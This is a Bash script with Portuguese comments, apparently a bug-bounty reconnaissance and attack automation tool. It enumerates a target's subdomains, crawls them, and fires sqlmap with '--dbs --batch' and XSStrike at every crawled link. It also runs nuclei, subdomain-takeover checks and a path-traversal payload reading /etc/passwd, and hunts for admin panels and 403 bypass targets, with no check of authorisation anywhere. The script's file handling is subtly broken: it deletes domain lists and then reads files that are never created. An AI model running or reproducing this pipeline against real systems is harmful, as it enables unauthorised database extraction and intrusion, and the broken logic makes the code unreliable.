#!/bin/bash
    echo "Use:"
    echo "./lowfruit.sh <dominio> <arquivo de sudominios>"
    echo ""

if [ "$2" == "" ]
then
    #------------------------- Usei meu outro script para enumeranção de subdominios ----------------------------------#
    amass enum --passive -d $1 -o domains_$1
    assetfinder --subs-only $1 | tee -a domains_$1

    subfinder -d $1 -o domains_subfinder_$1
    cat domains_subfinder_$1 | tee -a domains_$1

    sort -u domains_$1 -o domains_$1
    cat domains_$1 | filter-resolved | dnsx -silent -a -resp  | tee -a domains_$1
    #cat domains_$1 | filter-resolved | httpx -sc -ip -td -random-agent -server -vhost -mc 200,204,301,302,307,401,403 | tee -a domains_$1

    rm domains_$1
    rm domains_subfinder_$1
    #cat domains_$1 | cut -d "[" -f 1 | domains_$1
    #------------------------- Usei meu outro script para enumeranção de subdominios ----------------------------------#

    # Baixe o site usando o wget e armazene o conteúdo em um arquivo
    wget -r -i domains_$1.txt -O wgetdomains -U 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' --no-check-certificate --timeout=5
    
    # Extraia os links do site
    links=$(grep -o 'href=".*"' wgetdomains | sed 's/href=//' | sed 's/"//g')

    # Faça um loop pelos links do site
    for link in $links; do
        # Faça um teste de inject SQL usando o sqlmap
        sqlmap -u "$link" --dbs --batch

        # Faça um teste de cross-site scripting (XSS) usando o XSStrike
        python3 /root/go/bin/XSStrike/xsstrike.py -u "$link"
    done

    # Scaner de vuln
    nuclei -l domains_$1.txt

    # Subdomain takeonver
    subzy -targets domains_$1.txt | tee subdomainTakeOver.txt

    # Procurar URLs com base na internet
    cat domains_$1.txt | gau --subs --threads 5 | tee allUrls.txt

    # Encontrar todos os parametros
    grep "=" allUrls.txt | tee allParams.txt

    # Encontrar parametros refletidos
    cat allParams.txt | kxss | cut -d " " -f 2 | tee kxssTest

    # Validar Path Transversal
    httpx -l allUrls.txt -path "///////.../.../.../.../.../.../etc/passwd" -status-code -mc 200 -ms 'root:' | tee pathTraversal.txt

    # Encontrar extensões
    mkdir ext
    cat allUrls.txt | grep -i "\.log$" | tee ext/log.txt
    cat allUrls.txt | grep -i "\.bak$" | tee ext/bak.txt
    cat allUrls.txt | grep -i "\.xlsx$" | tee ext/xlsx.txt
    cat allUrls.txt | grep -i "\.js$" | tee ext/jsfiles.txt

    # Encontrar arquivos/direorios que não temos acesso para tentar bypass
    cat allUrls.txt | httpx -sc -nc | grep "403\|401" | tee bypass.txt

    # Encontrar paineis administrativos
    cat allUrls.txt | httpx -title | grep "admin\|login\|dashboard" | tee loginpanel.txt

    echo ""
    echo "Enumeração realizada"

else

    # Scaner de vuln
    nuclei -l domains_$1.txt

    # Subdomain takeonver
    subzy -targets domains_$1 | tee subdomainTakeOver.txt

    # Excluindo subdominios offline depois de tantar takeonver
    rm domains_$1

    # Procurar URLs com base na internet
    cat domains_$1.txt | gau --subs --threads 5 | tee allUrls.txt

    # Encontrar todos os parametros
    grep "=" allUrls.txt | tee allParams.txt

    # Encontrar parametros refletidos
    cat allParams.txt | kxss | cut -d " " -f 2 | tee xsstest

    # Validar Path Transversal
    httpx -l allUrls.txt -path "///////.../.../.../.../.../.../etc/passwd" -status-code -mc 200 -ms 'root:' | tee pathTraversal.txt

    # Encontrar extensões
    mkdir ext
    cat allUrls.txt | grep -i "\.log$" | tee ext/log.txt
    cat allUrls.txt | grep -i "\.bak$" | tee ext/bak.txt
    cat allUrls.txt | grep -i "\.xlsx$" | tee ext/xlsx.txt
    cat allUrls.txt | grep -i "\.js$" | tee ext/jsfiles.txt

    # Encontrar arquivos/direorios que nao temos acesso para tentar bypass
    cat allUrls.txt | httpx -sc -nc | grep "403\|401" | tee bypass.txt

    # Encontrar paineis administrativos
    cat allUrls.txt | httpx -title | grep "admin\|login\|dashboard" | tee loginpanel.txt

    echo ""
    echo "Enumeração realizada"
fi
